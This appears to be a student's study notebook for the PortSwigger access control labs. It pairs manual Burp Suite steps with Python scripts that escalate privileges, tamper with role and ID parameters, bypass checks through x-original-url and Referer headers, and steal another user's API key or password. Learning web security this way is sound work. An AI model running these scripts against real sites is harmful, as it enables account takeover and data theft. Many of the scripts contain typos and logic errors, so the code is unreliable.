# Remember to add the Portswigger as an experiance in linked starting date is 13-2

>> (python3 -m SimpleHTTPServer 8050) > make the current dire as server with port 8050

----------------------------------------------------------------------------------
                              # Access control Labs                                      

# Used Resources:

>> PortSwigger Labs:
   - https://portswigger.net/web-security/access-control

>> Eng.Rana Khalil Playlist: (IMPORTANT)
   - https://youtube.com/playlist?list=PLuyTk2_mYISId4_l9YET7Gv29cHcNguq-&feature=shared
   
>> Arab Hack Sploit Video:
   - https://www.youtube.com/watch?v=8gLOhMrIpVo&list=PLTSGZiCtCBfMMLkmaN7tGEhbc0QbOEtEA&index=10

>> Frank leitner GitHub WriteUp:
   - https://github.com/frank-leitner/portswigger-websecurity-academy/tree/main/07_access_control
   

# Access control vulnerabilities and privilege escalation:

>> What is access control?
   - the application of constraints on who or what is authorized to perform actions or access resources  
  
   
>> Access control security models:
   - Discretionary access control (DAC):
     - Owners of resources or functions have the ability to assign or delegate access permissions to users.
     
   - Mandatory access control (MAC):
     - centrally controlled system of access control in which access to some object (a file or other resource) by a subject is constrained
     - users and owners of resources have no capability to delegate or modify access rights for their resources. This model is often associated with military clearance-based systems.
   
   - Role-based access control (RBAC):
     - named roles are defined to which access privileges are assigned
     - Users are then assigned to single or multiple roles


>> Access Control Types:
   - Vertical access controls:
     - Mechanisms that restrict access to sensitive functionality to specific types of users
     - For example, an administrator might be able to modify or delete any user's account, while an ordinary user has no access to these actions
     
   - Horizontal access controls:
     - Mechanisms that restrict access to resources to specific users
     - For example, a banking application will allow a user to view transactions and make payments from their own accounts, but not the accounts of any other user

   - Context-dependent access controls:
     - restrict access to functionality and resources based upon the state of the application or the user's interaction with it
     - For example, a retail website might prevent users from modifying the contents of their shopping cart after they have made payment
   
   
>> Examples of Broken Access Controls:
   - Vertical privilege escalation:
     - If a user can gain access to functionality that they are not permitted to access
     - For example, if a non-administrative user can gain access to an admin page where they can delete user accounts
     
   - Unprotected functionality:
     - For example, administrative functions might be linked from an administrator's welcome page but not from a user's welcome page. However, a user might be able to access the administrative functions by browsing to the relevant admin URL

# Lab-1: Unprotected admin functionality: (Manual)

>> Mean You can access the Admin Panel from Predictable Url Path
   - Go to the Lab
   - In the URL Box first write (/robots.txt) {Always Check this }
   - You'll see that 'Disallow line' discloses the path to the admin panel
   - Now change (/robots.txt) to (/administrator-panel) 
   - Delete "Carlos"

In [ ]:
# Lab-1: Unprotected admin functionality: (Script)

import requests
import sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

proxies = {'http':'http//127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}

def delete_user(url):
  admin_panel_url = url + '/administrator-panel'
  r = requests.get(admin_panel_url, verifiy=False, proxies=proxies)
  if r.status_code == 200:
    print('(+) Found the administrator panel')
    print('(+) Deleting Carlos User ...')
    delet_carlos_url = admin_panel_url + '/delet?username=Carlos'
    r = requests.get(delet_carlos_url, verify=False, proxies=proxies)
    if r.status_code == 200:
      print('(+) Carlos user deleted successfully')
    
    else:
      print('(-) Could not delete user ...')
      
  else:
    print('(-) Administrator panel not found')
    print('(-) Exiting the script ...')
    
def main():
  if len(sys.argv) != 2:
    print('(+) Usage: %s <url>' %sys.argv[0])
    print('(+) Example: %s www.example.com' %sys.argv[0])
    sys.exit(-1)
    
  url = sys.argv[1]
  print('(+) Finding admin panel ....')
  delete_user(url)
    
if __name__ == '__main__':
  main()

# Lab-2: Unprotected admin functionality with unpredictable URL: (Manual)

>> Mean You can access the Admin Panel from UnPredictable Url Path
   - Go to the Lab
   - In the Page Source Code you can find a Function called is "IsAdmin"
   - In this function you will see the Path of the Admin Panel (/admin-84kts8)
   - Or by Intercepting the Page with Burb in Target tab you will see the path 
   - Type it in the end of the URL then
   - Delete "Carlos"

In [ ]:
# Lab-2: Unprotected admin functionality with unpredictable URL: (Script)

import requests
import sys
import urllib3
from bs4 import BeautifulSoup
import re
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

proxies = {'http':'http//127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}

def delete_user(url):
  r = requests.get(url, verify=False, proxies=proxies)
  
  # Get the Cookie:
  session_coockie = r.cookies.get_dict().get('session')
  
  # retrieve Admin panel:
  soup = BeautifulSoup(r.text, 'lxml')
  admin_instances = soup.find(string=re.compile("/admin-"))
  admin_path = re.search("href', '(.*)'", admin_instances).group(1)
  
  # Delete Carlos user:
  cookies = {"session": session_coockie}
  delete_carlos_url = url + admin_path + '/delet?username=carlos'
  r = requests.get(delete_carlos_url, cookies=cookies, verify=False, proxies=proxies)
  if r.status_code == 200:
    print ("(+) Deleting Carlos user ...")

  else:
    print ("(-) Deleting Failed ...")
    print ("(-) Exiting Script ...")
    sys.exit(1)
  

def main():
  if len(sys.argv) != 2:
    print('(+) Usage: %s <url>' % sys.argv[0])
    print('(+) Example: %s www.example.com' % sys.argv[0])
    sys.exit(-1)
    
  url = sys.argv[1]
  print('(+) Deleting Carlos User ...')
  delete_user(url)
  

if __name__ == "__main__":
  main()

# Lab-3: User role controlled by request parameter: (Manual)

>> Mean to get access to the admin panel from isAdmin param in the request:
   - Go to the lab 
   - open the burb proxy
   - intercept the requests
   - sign in with "wienere:peter"
   - in the Burb change (Admin:) to (true)
   - in any request change (Admin:) to (true) till deleting the user

In [ ]:
# Lab-3: User role controlled by request parameter: (Script)

import requests
import sys
import urllib3
from bs4 import BeautifulSoup

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

proxies = {'http':'http//127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}

def get_csrf_token(S, url):
  r = S.get(url, verify=False, proxies=proxies)
  soup = BeautifulSoup(r.text, 'html.parser')
  csrf = soup.find('input', {'name': 'csrf'})['value']
  return csrf


def delete_user(S, url):
  # get CSRF token from the login page
  login_url = url + "/login"
  csrf_token = get_csrf_token(S, login_url)
  
  #login with user and password
  data = {'csrf': csrf_token, 
          'username': 'wiener',
          'password':'peter'}
  
  r = S.post(login_url, data=data, verify=False, proxies=proxies)
  res = r.text
  if 'log out' in res:
    print("(+) Successfully Logged in as wiener user.")
    
    # retrieve session cookie
    session_cookie = r.cookies.get_dict().get("session")
    
    # visit the admin panel and delete the user
    delete_user_url = url + '/amdin/delete?username=carlos'
    coockies = {'session': session_cookie, "Admin": "true"}
    r = requests(delete_user_url, coockies=coockies, verify=False, proxies=proxies)
    if r.status_code == 200:
      print("(+) Successfully deleted the user.")
    else:
      print("(-) Failed to delete the user")
      sys.exit(-1)
  
  else:
    print("(+) Failed to login as the wiener user.")
    sys.exit(-1)


def main():
  if len(sys.argv) != 2:
    print("(+) Usage: %s <url>" % sys.argv[0])
    print('(+) Example: %s www.example.com' % sys.argv[0])
    sys.exit(-1)
    
  S = requests.Session()
  url = sys.argv[1]
  delete_user(S, url)

if __name__ == "__main__":
  main()

# Lab-4: User role can be modified in user profile: (Manual)

>> Mean to get access to the admin panel by changing roleid:
   - Go to the lab
   - open the burb proxy
   - intercept the requests
   - sign in with "wienere:peter"
   - in my account add any mail and change the mail
   - Read the response you'll see the (roleid)
   - intercept the prosses agian 
   - with changing the mail intercept the request and add (,"roleid":2) after the mail
   - now you can access the admin panel

In [ ]:
# Lab-4: User role can be modified in user profile: (Script)

import requests
import sys
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

proxies = {'http':'http//127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}

def delete_user(S, url):
   
  #login with user and password
  login_url = url + "/login"
  data = {'username': 'wiener', 'password':'peter'}
  
  r = S.post(login_url, data=data, verify=False, proxies=proxies)
  res = r.text
  if 'log out' in res:
    print("(+) Successfully Logged in as wiener user.")
    
    # Change the role id of the user
    change_email_url = url + "/my-account/change-email"
    data_role_change = {"email": "test@test.com", "roleid": 2}
    r = S.post(change_email_url, json=data_role_change, verify=False, proxies=proxies)
    res = r.text
    if "Admin" in res:
      print("(+) Successfully changed the role id")
      
      # Delete the user
      delete_carlos_user_url = url + "/admin/delete?username=carlos"
      r = S.post(delete_carlos_user_url, verify=False, proxies=proxies)
      if r.status_code == 200:
        print("(+) Successfully deleted the user.")
      
      else:
        print("(-) Failed to delete the user")
        sys.exit(-1)
    
    else:
      print("(-) Failed to change the role id")
      sys.exit(-1) 
    
  else:
    print("(+) Failed to login as the wiener user.")
    sys.exit(-1)

def main():
  if len(sys.argv) != 2:
    print("(+) Usage: %s <url>" % sys.argv[0])
    print('(+) Example: %s www.example.com' % sys.argv[0])
    sys.exit(-1)
    
  S = requests.Session()
  url = sys.argv[1]
  delete_user(S, url)

if __name__ == "__main__":
  main()

# Lab-5: URL-based access control can be circumvented: (Manual)

>> Mean to add (x-original-url: /path) to your request to pass the restriction:
   - go to the lab
   - open the Burb
   - intercept the request when you open the "admin panel page"
   - replace (GET /admin) with (GET /) after the GET method
   - now you can access the admin panel
   - Then intercept the other request of "deleting carlos"
   - Change (GET /admin/delete?username=carlos) to (GET /?username=carlos)
   - and add the x-original-url to the request (x-original-url /admin/delete)
   - reload the page and Hoola the lab is solved

In [ ]:
# Lab-5: URL-based access control can be circumvented: (Script)

import requests
import sys
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

proxies = {'http':'http//127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}

def delete_user(S, url):
   
  delete_carlos_url = url + "/?username=carlos"
  headers = {'x-original-url': '/admin/delete'}
  r = S.get(delete_carlos_url, headers=headers, verify=False, proxies=proxies)
  
  # verify if the user was deleted successfully
  r = S.get(url, verify=False, proxies=proxies)
  res = r.text
  if 'Congratulations, you solved the lab!' in res:
    print("(+) Successfully deleted the user.")
    
  else:
    print("(-) Failed to delete the user")
    sys.exit(-1) 
    

def main():
  if len(sys.argv) != 2:
    print("(+) Usage: %s <url>" % sys.argv[0])
    print('(+) Example: %s www.example.com' % sys.argv[0])
    sys.exit(-1)
    
  S = requests.Session()
  url = sys.argv[1]
  delete_user(S, url)

if __name__ == "__main__":
  main()

# lab-6: Method-based access control can be circumvented: (Manual)

>> Mean to be admin with normal user by changing the Method (Method Validation):
   - open the lab
   - sign in with (administrator:admin)> admin user
   - go to the admin panel and discover how it works
   - intercept the request of upgrading any user and see the sent "request headers"
   - sing in with (wiener:peter)> normal user
   - intercept the changing mail request and try to access the (/admin) panel
   - Change the changing mail request and try to upgrade your previliges
   - change the method of the request from (POST >> GET)
   - change path to (GET /admin-roles?username=wiener&action=upgrade)
   - Hoola the lab solved

In [ ]:
# lab-6: Method-based access control can be circumvented: (Script)

import requests
import sys
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

proxies = {'http':'http//127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}

def promote_to_admin(S, url):
   
  # login to the user wiener 
  login_url = url + "/login"
  data_login = {'username': 'wiener', 'password':'peter'}
  
  r = S.post(login_url, data=data_login, verify=False, proxies=proxies)
  res = r.text
  if 'Log out' in res:
    print("(+) Successfully logged in.")
    
    # exploit the access control vuln
    admin_roles_url = url + '/admin-roles?username=carlos&action=upgrade'
    r = S.get(admin_roles_url, verify=False, proxies=proxies)
    res = r.text
    if 'Admin panel' in res:
      print('(+) Successfully promoted')
    else:
      print('(-) Could not promote the user')
    
  else:
    print("(-) Failed to log in with the user")
    sys.exit(-1) 
    

def main():
  if len(sys.argv) != 2:
    print("(+) Usage: %s <url>" % sys.argv[0])
    print('(+) Example: %s www.example.com' % sys.argv[0])
    sys.exit(-1)
    
  S = requests.Session()
  url = sys.argv[1]
  promote_to_admin(S, url)

if __name__ == "__main__":
  main()

# Lab-7: User ID controlled by request parameter: (Manual)

>> Mean to change the id parameter to take access to another user:
   - open the lab
   - sign in with (wiener:peter)
   - intercept the request of opening 'my account' page
   - change the "id" param to "carlos" user
   - now you are carlos

In [ ]:
# Lab-7: User ID controlled by request parameter: (Script)

import requests
import sys
import urllib3
import re
from bs4 import BeautifulSoup

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

proxies = {'http':'http//127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}

def get_csrf_token(S, url):
  r = S.get(url, verify=False, proxies=proxies)
  soup = BeautifulSoup(r.text, "html.parser")
  csrf = soup.find("input", {'name': 'csrf'})["value"]
  return csrf


def carlos_api_key(S, url):
  
  # get the csrf token
  login_url = url + "/login"
  csrf_token = get_csrf_token(S, login_url)
   
  # login to the user wiener
  print('(+) Logging in as wiener')
  data_login = {'csrf': csrf_token, 'username': 'wiener', 'password':'peter'}
  
  r = S.post(login_url, data=data_login, verify=False, proxies=proxies)
  res = r.text
  if 'Log out' in res:
    print("(+) Successfully logged in.")
    
    # exploit the access control vuln
    carlos_url = url + '/my-account?id=carlos'
    r = S.get(carlos_url, verify=False, proxies=proxies)
    res = r.text
    if 'carlos' in res:
      print('(+) Successfully accessed carlos account')
      print('(+) Retrieving carlos API key')
      api_key = re.search('Your API key is:(.*)', res).group(1)
      print("API key is:" + api_key.split('</div>')[0])
      
    else:
      print('(-) Could not access')
      sys.exit(-1)
    
  else:
    print("(-) Failed to log in with the user")
    sys.exit(-1) 
    

def main():
  if len(sys.argv) != 2:
    print("(+) Usage: %s <url>" % sys.argv[0])
    print('(+) Example: %s www.example.com' % sys.argv[0])
    sys.exit(-1)
    
  S = requests.Session()
  url = sys.argv[1]
  carlos_api_key(S, url)

if __name__ == "__main__":
  main()

# Lab-8: User ID controlled by request parameter, with unpredictable user IDs: (Manual)

>> Mean that the vuln id param can't be guessed:
   - open the lab
   - sign in with (wiener:peter) 
   - take a tour in the wep app
   - open some posts on the home tab
   - Till you find the post by (carlos) user
   - Copy his ID from the URL
   - open my account tab
   - Replace your ID with carlos ID
   - Now you can see the API of carlos user

In [ ]:
# Lab-8: User ID controlled by request parameter, with unpredictable user IDs: (Script)

import requests
import sys
import urllib3
import re
from bs4 import BeautifulSoup

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

proxies = {'http':'http//127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}

def get_csrf_token(S, url):
  r = S.get(url, verify=False, proxies=proxies)
  soup = BeautifulSoup(r.text, "html.parser")
  csrf = soup.find("input", {'name': 'csrf'})["value"]
  return csrf


def carlos_guid(S, url):
  
  # load home page
  r  = requests.get(url, verify=False, proxies=proxies)
  res = r.text
  post_ids = re.findall(r'postId=(\W+)"')
  unique_post_ids = list(set(post_ids))
  
  # loop post ids to get carlos post
  for i in unique_post_ids:
    r = S.get(url + "/post/postID=" + i, verify=False, proxies=proxies)
    res = r.text
    if 'carlos' in res:
      print("(+) Found carlos GUID")
      guid = re.findall(r"userID=(.*)'", res)[0]
      return guid


def calros_api_key(S, url):
  
  # get the CSRF token from the login page
  login_url = url + "/login"
  csrf_token = get_csrf_token(S, login_url)
  
  # login to the user wiener
  print('(+) Logging in as wiener')
  data_login = {'csrf': csrf_token, 'username': 'wiener', 'password':'peter'}
  
  r = S.post(login_url, data=data_login, verify=False, proxies=proxies)
  res = r.text
  if 'Log out' in res:
    print("(+) Successfully logged in.")
  
    # obtain carlos's GUID
    guid = carlos_guid(S, res)
    
    # obtain carlos's API key
    carlos_account_url = url + '/my-account?id=' + guid
    r = S.get(carlos_account_url, verify=False, proxies=proxies)
    res = r.text
    if 'carlos' in res:
      print('(+) Successfully accessed carlos account')
      print('(+) Retrieving carlos API key')
      api_key = re.search('Your API key is:(.*)\<\/div>', res)[0]
      print("API key is: " + api_key[0])
      
    else:
      print('(-) Could not access')
      sys.exit(-1)
  
  else:
    print("(-) Failed to log in with the user")
    sys.exit(-1) 


def main():
  if len(sys.argv) != 2:
    print("(+) Usage: %s <url>" % sys.argv[0])
    print('(+) Example: %s www.example.com' % sys.argv[0])
    sys.exit(-1)
    
  S = requests.Session()
  url = sys.argv[1]
  carlos_api_key(S, url)

if __name__ == "__main__":
  main()

# Lab-9: User ID controlled by request parameter with data leakage in redirect: (Manual)

>> Mean that in the Redirection you can find a leakeged data:
   - open the lab
   - sing in with (wiener:peter)
   - intercept the request of opening (my account) tab with user wiener
   - change the id param to (id=carlos)
   - send the request with Burbe intruder and search in the response for API
   - You'll find the Carlos api key in the redirection page in Burb response

In [ ]:
# Lab-9: User ID controlled by request parameter with data leakage in redirect: (Script)

import requests
import sys
import urllib3
import re
from bs4 import BeautifulSoup

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

proxies = {'http':'http//127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}

def get_csrf_token(S, url):
  r = S.get(url, verify=False, proxies=proxies)
  soup = BeautifulSoup(r.text, "html.parser")
  csrf = soup.find("input", {'name': 'csrf'})["value"]
  return csrf


def calros_api_key(S, url):
  
  # get the CSRF token from the login page
  login_url = url + "/login"
  csrf_token = get_csrf_token(S, login_url)
  
  # login to the user wiener
  print('(+) Logging in as wiener')
  data_login = {'csrf': csrf_token, 'username': 'wiener', 'password':'peter'}
  
  r = S.post(login_url, data=data_login, verify=False, proxies=proxies)
  res = r.text
  if 'Log out' in res:
    print("(+) Successfully logged in.")
    
    # Access the carlos account
    print("(+) Attempting to exploit access control vuln...")
    carlos_account_url = url + "/myaccount?id=carlos"
    r = S.get(carlos_account_url, allow_redirects=False, verify=False, proxies=proxies)
    res = r.text
    if 'carlos' in res:
      print("(+) Retrieving API key...")
      api_key = re.findall(r'Your API key is:(.*)\<\/div>', res)
      print('API key is: ' + api_key[0])
      
    else:
      print("(-) Could not exploit access control vuln...")
    
  else:
    print("(-) Failed to log in with the user")
    sys.exit(-1) 


def main():
  if len(sys.argv) != 2:
    print("(+) Usage: %s <url>" % sys.argv[0])
    print('(+) Example: %s www.example.com' % sys.argv[0])
    sys.exit(-1)
    
  S = requests.Session()
  url = sys.argv[1]
  carlos_api_key(S, url)

if __name__ == "__main__":
  main()

# Lab-10: User ID controlled by request parameter with password disclosure: (Manual)

>> Mean that the Password is available in the my account page in the admin account:
   - open the lab
   - sign in with (Wiener:peter)
   - change the id param in the URL to (my-account=administrator)
   - it will open the admin page with password typed
   - open the inspect page and change the type "password" to "text"
   - copy the administrator pass
   - log with (administrator: copied pass)
   - delete carlos user

In [ ]:
# Lab-10: User ID controlled by request parameter with password disclosure: (Script)

import requests
import sys
import urllib3
import re
from bs4 import BeautifulSoup

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

proxies = {'http':'http//127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}

def get_csrf_token(S, url):
  r = S.get(url, verify=False, proxies=proxies)
  soup = BeautifulSoup(r.text, "html.parser")
  csrf = soup.find("input", {'name': 'csrf'})["value"]
  return csrf


def retrieve_admin_password(S, url):
  
  # get the CSRF token from the login page
  login_url = url + "/login"
  csrf_token = get_csrf_token(S, login_url)
  
  # login to the user wiener
  print('(+) Logging in as wiener')
  data_login = {'csrf': csrf_token, 'username': 'wiener', 'password':'peter'}
  
  r = S.post(login_url, data=data_login, verify=False, proxies=proxies)
  res = r.text
  if 'Log out' in res:
    print("(+) Successfully logged in.")
    
    # get the admin password
    admin_account_url = url + "my-account?id=administrator"
    r = S.get(admin_account_url, verify=False, proxies=proxies)
    res = r.text
    
    if 'administrator' in res:
      print("(+) Successfully accessed the administrator account")
      print("(+) Retrieving the admin password")
      soup = BeautifulSoup(r.text, 'html.parser')
      password = soup.find("input", {'name': 'password'})["value"]
      return password
      
    else:
      print("(-) Could not access the admin account")
      sys.exit(-1)
  
  else:
   print("(-) Failed to log in with the user")
   sys.exit(-1) 


def delete_carlos_user(s, url, password):

  # get the CSRF token from the login page
  login_url = url + "/login"
  csrf_token = get_csrf_token(s, login_url)
  
  # login to the user admin
  print('(+) Logging in as admin')
  data_login = {'csrf': csrf_token, 'username': 'wiener', 'password':password}
  
  r = s.post(login_url, data=data_login, verify=False, proxies=proxies)
  res = r.text
  if 'Log out' in res:
    print("(+) Successfully logged in as admin.")
    
    # delete the user carlos
    print("(+) Deleting carlos user")
    delete_carlos_user_url = url + "/admin/delete?username=carlos"
    r = s.get(delete_carlos_user_url, verify=False, proxies=proxies)
    if r.status_code == 200:
      print("Successfully deleted carlos user")
      
    else:
      print("could not delete the user")
      sys.exit(-1)
    
  else:
    print("(-) Failed to log in as admin")
    sys.exit(-1)
  

def main():
  if len(sys.argv) != 2:
    print("(+) Usage: %s <url>" % sys.argv[0])
    print('(+) Example: %s www.example.com' % sys.argv[0])
    sys.exit(-1)
    
  S = requests.Session()
  url = sys.argv[1]
  admin_password = retrieve_admin_password(S, url)
  
  # delete carlos user
  s = requests.Session()
  delete_carlos_user(s, url, admin_password)

if __name__ == "__main__":
  main()

# Lab-11: Insecure direct object references: (Manual)

>> Mean that Changing the download URL text leads to others credentials leaked:
   - open the lab 
   - open Burb and spyder the web app
   - open all tabs and type in the live chat tab
   - click on View transcript
   - intercept this request then on the target tab on Burb
   - open the (download-transcript) folder and change the request
   - from (GET /download-transcript/2.txt) >> (GET /dwonload-transcript/1.txt)
   - you will get the carlos password
   - log in with carlos and the lab is solved :)

In [ ]:
# Lab-11: Insecure direct object references: (Script)

import requests
import sys
import urllib3
import re
from bs4 import BeautifulSoup

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

proxies = {'http':'http//127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}

def get_csrf_token(s, url):
  r = s.get(url, verify=False, proxies=proxies)
  soup = BeautifulSoup(r.text, "html.parser")
  csrf = soup.find("input", {'name': 'csrf'})["value"]
  return csrf


def retrieve_carlos_password(s, url):
  chat_url = url + "/download-transcript/1.txt"
  r = s.get(chat_url, verify=False, proxies=proxies)
  res = r.text
  if 'password' in res:
    print("(+) Found Carlos's password")
    carlos_password = re.findall(r'password is (.*)\.', res)
    return carlos_password[0]
  
  else:
    print("(-) Could not find carlos's password")
    sys.exit(-1)


def carlos_login(s, url, password):
  
  # get the CSRF token from the login page
  login_url = url + "/login"
  csrf_token = get_csrf_token(s, login_url)
  
  # login to the user carlos
  print('(+) Logging in as carlos')
  data_login = {'csrf': csrf_token, 'username': 'wiener', 'password':password}
  
  r = s.post(login_url, data=data_login, verify=False, proxies=proxies)
  res = r.text
  if 'Log out' in res:
    print("(+) Successfully logged in as carlos.")
    
  else:
    print("(-) Failed to log in as carlos")
    sys.exit(-1)
  

def main():
  if len(sys.argv) != 2:
    print("(+) Usage: %s <url>" % sys.argv[0])
    print('(+) Example: %s www.example.com' % sys.argv[0])
    sys.exit(-1)
    
  s = requests.Session()
  url = sys.argv[1]
  carlos_password = retrieve_carlos_password(s, url)
  
  print("(+) Logging into carlos account")
  carlos_login(s, url, carlos_password)
  

if __name__ == "__main__":
  main()

# Lab-12: Multi-step process with no access control on one step: (Manual)

>> Mean that Manipulating the request to be like the administration request leads to make other users have administrator privileges:
   - open the lab
   - open Burb and spyder the web app
   - log in with (administrator:admin) and do some actions
   - like changing the mail, upgrading, and downgrading users 
   - intercept these requests to use with wiener user
   - observe the requests and see the params
   - log in with (wiener:peter)
   - copy the request of upgrading users
   - change the request cookie to wiener and add (action=upgrade&confirmed=true&username=wiener) to the request
   - Now you are admin

In [ ]:
# Lab-12: Multi-step process with no access control on one step: (Script)

import requests
import sys
import urllib3
import re
from bs4 import BeautifulSoup

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

proxies = {'http':'http//127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}

def upgrade_wiener_user(s, url):
  
  # login as wiener
  login_url = url + "/login"
  data_login = {'username': 'wiener', 'password':'peter'}
  
  r = s.post(login_url, data=data_login, verify=False, proxies=proxies)
  res = r.text
  if 'Log out' in res:
    print("(+) Successfully logged in as wiener.")
    
    # upgrade wiener to admin
    print("(+) Upgrading user to be an admin")
    upgrade_url = url + '/admin-roles'
    data_upgrade = {'action': 'upgrade', 'confirm': 'true', 'username': 'wiener'}
    
    r = s.post(upgrade_url, data=data_upgrade,  verfiy=False, proxies=proxies)
    if r.status_code == 200:
      print("(+) Successfuly upgraded the user")
    
    else:
      print("(-) Failed to upgrade the user")
      sys.exit(-1)
    
  else:
    print("(-) Failed to log in as wiener")
    sys.exit(-1)


def main():
  if len(sys.argv) != 2:
    print("(+) Usage: %s <url>" % sys.argv[0])
    print('(+) Example: %s www.example.com' % sys.argv[0])
    sys.exit(-1)
    
  s = requests.Session()
  url = sys.argv[1]
  upgrade_wiener_user(s, url)

if __name__ == "__main__":
  main()

# Lab-13: Referer-based access control: (Manual)

>> Mean that Manipulating the request referer parameter leads to access some admin functionality:
   - open the lab
   - Open Burb and spyder the web app
   - log in with (administrator:admin) and do some actions
   - like changing the mail, upgrading, and downgrading users
   - intercept these requests to use them with other account
   - log out then log in with (wiener:peter)
   - intercept the my account and change some params like
   - (GET /admin-roles?username-wiener&action=upgrade)
   - Add (/admin) to the end of the Referer URL instead of (/login)
   - send the request 
   - Now you are an admin

In [ ]:
# Lab-13: Referer-based access control: (Script)

import requests
import sys
import urllib3
import re
from bs4 import BeautifulSoup

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

proxies = {'http':'http//127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}

def upgrade_wiener_user(s, url):
  
  # login as wiener
  login_url = url + "/login"
  data_login = {'username': 'wiener', 'password':'peter'}
  
  r = s.post(login_url, data=data_login, verify=False, proxies=proxies)
  res = r.text
  if 'Log out' in res:
    print("(+) Successfully logged in as wiener.")
    
    # upgrade wiener to admin
    print("(+) Upgrading user to be an admin")
    upgrade_url = url + '/admin-roles?username=wiener&actioin=upgrade'
    headers = {'Referrer': url + '/admin'}
    
    r = s.post(upgrade_url, headers=headers, verfiy=False, proxies=proxies)
    if r.status_code == 200:
      print("(+) Successfuly upgraded the user")
    
    else:
      print("(-) Failed to upgrade the user")
      sys.exit(-1)
    
  else:
    print("(-) Failed to log in as wiener")
    sys.exit(-1)



def main():
  if len(sys.argv) != 2:
    print("(+) Usage: %s <url>" % sys.argv[0])
    print('(+) Example: %s www.example.com' % sys.argv[0])
    sys.exit(-1)
    
  s = requests.Session()
  url = sys.argv[1]
  upgrade_wiener_user(s, url)

if __name__ == "__main__":
  main()